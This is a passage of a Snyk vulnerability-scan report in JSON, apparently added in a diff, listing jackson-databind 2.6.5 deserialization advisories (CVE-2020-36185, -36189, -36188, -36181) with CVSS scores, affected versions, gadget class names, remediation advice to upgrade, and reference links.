"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": 
"3.1", + "modificationTime": "2024-03-06T13:59:37.622591Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36185" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:36:40.536722Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:34:52Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.303463Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:01.307628Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T13:59:42.513059Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36189" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:37:54.679882Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:37:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.089230Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.824076Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36188", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + 
"baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.488317Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36188" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:39:28.531700Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:32Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:03.468032Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Poc" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.757298Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36181" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:41:09.172252Z", + "functions_new": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.686589Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Yangkun (ICSL)" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2854", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", + "title": "GitHub Release" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": 
"2024-03-11T09:50:15.847219Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:04.169362Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + 